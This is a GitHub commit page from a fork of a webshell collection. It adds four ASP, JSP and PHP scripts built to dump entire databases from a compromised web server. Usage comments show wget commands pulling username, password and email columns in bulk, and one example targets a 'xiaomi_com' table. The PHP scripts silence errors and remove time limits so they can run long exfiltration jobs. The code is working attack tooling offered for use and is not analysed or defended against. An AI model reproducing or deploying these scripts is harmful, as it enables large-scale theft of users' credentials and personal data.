forked from tennc/webshell
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
4 changed files
with
287 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
| <%@LANGUAGE="VBSCRIPT" CODEPAGE="65001" %>'这里改编码方式 | ||
| <% | ||
| '用法:如果把本程序放在[url]http://www.xxx.com/sql.asp[/url],可以wget [url]http://www.xxx.com/sql.asp[/url] -O x.csv 来直接拖库 | ||
| Response.Buffer = True | ||
| Server.ScriptTimeout = 2147483647 | ||
|
|
||
| str="Driver={Sql Server};Server=192.168.1.5;Uid=mssql库名;Pwd=mssql密码;Database=库名" 这里是连接字符串 | ||
| Set Conn=Server.CreateObject("Adodb.connection") | ||
| Conn.Open str | ||
|
|
||
| Set Rs = Server.Createobject("Adodb.Recordset") | ||
|
|
||
| Sqlstr="SELECT * FROM 库名.dbo.[表名]" '这里是导哪个库哪个表的语句 | ||
| Rs.Open Sqlstr,Conn,3,3 | ||
|
|
||
| If(Rs.Fields.Count > 0)Then | ||
| For I = 0 To Rs.Fields.Count - 1 | ||
| Response.Write Rs.Fields(i).Name & " " | ||
| Next | ||
| Response.Write(vbNewLine) | ||
|
|
||
| For I = 1 To Rs.RecordCount | ||
|
|
||
| If(I Mod 100 = 0)Then | ||
| Response.Flush | ||
| End If | ||
|
|
||
| For J = 0 To Rs.Fields.Count - 1 | ||
| Response.Write Rs(J) & " " | ||
| Next | ||
|
|
||
| Response.Write(vbNewLine) | ||
|
|
||
| Rs.MoveNext | ||
| Next | ||
| End If | ||
|
|
||
| Rs.Close | ||
| Conn.Close | ||
| If(Err <> 0)Then Response.Write(Err.Description) | ||
| Set Rs = Nothing | ||
| Set Conn = Nothing | ||
| %> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,85 @@ | ||
| <%@ page contentType="text/html; charset=utf-8" %> | ||
| <%@ page language="java" %> | ||
| <%@ page import="java.sql.*" %> | ||
|
|
||
| <% | ||
| //author: By Gavin | ||
| //Usage: wget "http://xxx.com/wget_db.jsp?sn=0&en=5000000&ln=50000" -O gavin.sql | ||
|
|
||
| out.clear(); | ||
| //分段每次limit查询出来的条数,根据实际情况调整,默认为2w | ||
| int MAX_LIMIT_NUM = 20000; | ||
| //最大缓存条数,防止占用过多内存,根据每条数据大小调整 | ||
| int MAX_CACHE_NUM = 5000; | ||
|
|
||
| //驱动程序名 | ||
| String driverName="com.mysql.jdbc.Driver"; | ||
| // 数据库地址 | ||
| String dbAddress = "127.0.0.1:3306"; | ||
| //数据库用户名 | ||
| String userName="root"; | ||
| //密码 | ||
| String userPasswd="root"; | ||
| //数据库名 | ||
| String dbName="DBName"; | ||
| // 查询字段 | ||
| String columns[] = "username,password".split(","); | ||
| //表名 | ||
| String tableName="table_name"; | ||
|
|
||
| // 接受参数 | ||
| int startNum = Integer.valueOf(request.getParameter("sn")); //接收起始条数 | ||
| int endNum = Integer.valueOf(request.getParameter("en")); //接收结束条数 | ||
| String ln = request.getParameter("ln"); | ||
| if (ln != null && ln != "") MAX_LIMIT_NUM = Integer.valueOf(ln); //接收每次分段查询的条数 | ||
| int gavin_downNum = endNum - startNum; //计算总下载条数 | ||
|
|
||
| if (endNum < MAX_LIMIT_NUM) MAX_LIMIT_NUM = endNum; | ||
| int multiple = gavin_downNum/MAX_LIMIT_NUM; | ||
| int complement = gavin_downNum%MAX_LIMIT_NUM; | ||
|
|
||
| // 连接数据库 | ||
| String url="jdbc:mysql://"+dbAddress+"/"+dbName+"?user="+userName+"&password="+userPasswd; | ||
| Class.forName(driverName).newInstance(); | ||
| Connection connection=DriverManager.getConnection(url); | ||
| Statement statement = connection.createStatement(); | ||
|
|
||
| // 拼装前半部分sql | ||
| String sql = "SELECT "; | ||
| for(int i=0;i<columns.length;i++){ | ||
| if(i == (columns.length-1)){ | ||
| sql += columns[i]; | ||
| } else { | ||
| sql += columns[i] + ","; | ||
| } | ||
| } | ||
| sql += " FROM " + tableName + " "; | ||
|
|
||
| int num = 1; | ||
|
|
||
| for(int i=0;i<multiple;i++) { | ||
| int newStartNum = i*MAX_LIMIT_NUM+startNum; | ||
| if(i == (multiple-1)) MAX_LIMIT_NUM += complement; | ||
| String newSql = sql + " limit " + newStartNum + "," + MAX_LIMIT_NUM; | ||
| java.sql.ResultSet rs = statement.executeQuery(newSql); | ||
| //获得数据结果集合 | ||
| //ResultSetMetaData rmeta = rs.getMetaData(); | ||
| while(rs.next()) { | ||
| num ++; | ||
| for(int j=1;j<=columns.length;j++){ | ||
| if(j == columns.length){ | ||
| out.println(rs.getString(j)); | ||
| } else { | ||
| out.print(rs.getString(j)+"-->"); | ||
| } | ||
| } | ||
| if (num >= MAX_CACHE_NUM) { | ||
| out.flush(); | ||
| num = 0; | ||
| } | ||
| } | ||
| rs.close(); | ||
| } | ||
| statement.close(); | ||
| connection.close(); | ||
| %> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,96 @@ | ||
| <?php | ||
| //使用方法: wget "http://localhost/getsql.php?t='xiaomi_com'&f=username,password,email&s=0&e=2000000$l=5000" -O data.txt | ||
| //借鉴了 LCX Gavin 2大前辈的脚本. | ||
| // LCX [url=https://www.t00ls.net/thread-26740-1-1.html]https://www.t00ls.net/thread-26740-1-1.html[/url] | ||
| // Gavin [url=https://www.t00ls.net/thread-26791-1-1.html]https://www.t00ls.net/thread-26791-1-1.html[/url] | ||
| // | ||
|
|
||
| error_reporting(0); | ||
| ignore_user_abort(); | ||
| set_time_limit(0); | ||
| ob_clean(); | ||
|
|
||
| define('DB_HOST', '127.0.0.1'); | ||
| define('DB_PORT','3306'); | ||
| define('DB_NAME', 'thinkphp'); | ||
| define('DB_USER', 'root'); | ||
| define('DB_PASS', 'wanan'); | ||
| define('DB_CHAR', 'utf8'); | ||
|
|
||
| $type=class_exists('PDO')?'PDO':'MYSQL'; | ||
| $table=$_GET['t']?$_GET['t']:die('表名必须!'); //表名 必须 t | ||
| $limit_start=$_GET['s']?intval($_GET['s']):0; //开始条数 可选 s 默认为0 | ||
| $limit_end=$_GET['e']?intval($_GET['e']):0; //结束条数 可选 e 默认为所有 | ||
| $limit_length=$_GET['l']?intval($_GET['l']):5000; //分段条数 可选 l 默认为5000 | ||
| $filed=$_GET['f']?$_GET['f']:'*'; //字段名 可选 f 用,分割没有则为全部字段 | ||
|
|
||
| if($type=='PDO'){ | ||
| $dsn='mysql:host='.DB_HOST.';port='.DB_PORT.';dbname='.DB_NAME; | ||
| $options = array( | ||
| PDO::MYSQL_ATTR_INIT_COMMAND => 'SET NAMES '.DB_CHAR, | ||
| ); | ||
| try{ | ||
| $dbh = new PDO($dsn,DB_USER,DB_PASS,$options); | ||
| }catch (PDOException $e) { | ||
| die('PDO ERROR!'); | ||
| } | ||
| $sql='SELECT COUNT(-1) FROM `'.$table.'`;'; | ||
| $do=$dbh->query($sql); | ||
| if($do){ | ||
| $count=$do->fetch(); | ||
| }else{ | ||
| die('PDO COUNT ERROR'); | ||
| } | ||
| $limit_end=($limit_end)?$limit_end:$count[0]; | ||
| $limit_end=$limit_end-$limit_start; | ||
| $limit_length=$limit_end>$limit_length?$limit_length:$limit_end; | ||
| $section=ceil($limit_end/$limit_length); | ||
| if (ob_get_level() == 0){ | ||
| ob_start(); | ||
| }else{ | ||
| die('PDO ERROR'); | ||
| } | ||
| for($i=0;$i<$section;$i++){ | ||
| $sql='SELECT '.$filed.' FROM '.$table.' LIMIT '.($limit_start+1+$i*$limit_length).','.$limit_length.';'; | ||
| $s=$dbh->query($sql); | ||
| $arr=$s->fetchALL(PDO::FETCH_ASSOC); | ||
| foreach ($arr as $value) { | ||
| echo(implode(' ', $value)."\n"); | ||
| } | ||
| ob_end_flush(); | ||
| } | ||
|
|
||
| }else{ | ||
| $link=mysql_connect(DB_HOST.':'.DB_PASS,DB_USER,DB_PASS); | ||
| if($link){ | ||
| mysql_select_db(DB_NAME,$link); | ||
| mysql_query('SET NAMES '.DB_CHAR); | ||
| $sql='SELECT COUNT(-1) FROM `'.$table.'`;'; | ||
| $count=mysql_fetch_array(mysql_query($sql)); | ||
| $limit_end=($limit_end)?$limit_end:$count[0]; | ||
| $limit_end=$limit_end-$limit_start; | ||
| $limit_length=$limit_end>$limit_length?$limit_length:$limit_end; | ||
| $section=ceil($limit_end/$limit_length); | ||
| if (ob_get_level() == 0){ | ||
| ob_start(); | ||
| }else{ | ||
| die('MYSQL ERROR'); | ||
| } | ||
| for($i=0;$i<$section;$i++){ | ||
| $sql='SELECT '.$filed.' FROM '.$table.' LIMIT '.($limit_start+1+$i*$limit_length).','.$limit_length.';'; | ||
| $a=mysql_query($sql); | ||
| if($b=mysql_fetch_row($a)){ | ||
| do{ | ||
| echo(implode(' ', $b)."\n"); | ||
| }while($b=mysql_fetch_row($a)); | ||
| } | ||
| ob_end_flush(); | ||
| } | ||
| }else{ | ||
| die('MYSQL ERROR!'); | ||
| } | ||
|
|
||
| } | ||
|
|
||
|
|
||
| ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,63 @@ | ||
| <?php | ||
| //author: By Gavin | ||
| //Usage: wget "http://xxx.com/wget_sql.php?sn=0&en=5000000&ln=50000" -O gavin.sql | ||
|
|
||
| error_reporting(0); | ||
| ignore_user_abort(); | ||
| set_time_limit(0); | ||
| ob_clean(); | ||
|
|
||
| //配置数据库信息 | ||
| $DB_Server="127.0.0.1:3306"; | ||
| $DB_User="root"; | ||
| $DB_Pass="root"; | ||
| $DB_Name="DBName"; | ||
|
|
||
| //分段每次limit查询出来的条数,根据实际情况调整,默认为2w | ||
| $max_limit_num = 20000; | ||
| //最大缓存条数,防止占用过多内存,根据每条数据大小调整 | ||
| $max_cache_num = 5000; | ||
|
|
||
|
|
||
| $gavin_start_num = intval($_GET['sn']); //接收起始条数 | ||
| $gavin_end_num = intval($_GET['en']); //接收结束条数 | ||
| if (intval($_GET['ln'])) $max_limit_num = intval($_GET['ln']); //接收每次分段查询的条数 | ||
| $gavin_down_num = intval($gavin_end_num - $gavin_start_num); //计算总下载条数 | ||
|
|
||
| if ($gavin_end_num < $max_limit_num) $max_limit_num = $gavin_end_num; | ||
| $beishu = intval($gavin_down_num/$max_limit_num); | ||
| $yushu = intval($gavin_down_num%$max_limit_num); | ||
|
|
||
| $conn=@mysql_connect($DB_Server,$DB_User,$DB_Pass); | ||
| if ($conn==FALSE) { | ||
| echo "数据库连接出错!<br>"; | ||
| exit(); | ||
| } | ||
| if (@mysql_select_db($DB_Name,$conn)==FALSE) { | ||
| echo "打开数据库:".$DB_Name." 失败!"; | ||
| exit(); | ||
| } | ||
|
|
||
| mysql_query("set names 'utf8'"); | ||
| $num = 1; | ||
| $out_put_str = ''; | ||
| if (ob_get_level() == 0) ob_start(); | ||
|
|
||
| for ($i=0;$i<$beishu;$i++){ | ||
| $new_start_num = $i*$max_limit_num+$gavin_start_num; | ||
| if ($i == ($beishu-1)) $max_limit_num += $yushu; | ||
| $sql = "select username,password from `table_name` limit ".$new_start_num.",".$max_limit_num; //配置SQL语句 | ||
| $res = mysql_query($sql) or die(mysql_error()); | ||
| while($result = mysql_fetch_array($res)) | ||
| { | ||
| $num ++; | ||
| $out_put_str = $result["username"]."-->".$result["password"]."\n"; //格式化脱出的数据,根据SQL中的字段调整 | ||
| if ($num >= $max_cache_num){ | ||
| @ob_end_flush(); | ||
| $num = 0; | ||
| } | ||
| echo $out_put_str; | ||
| // unset($out_put_str); | ||
| } | ||
| } | ||
| ?> |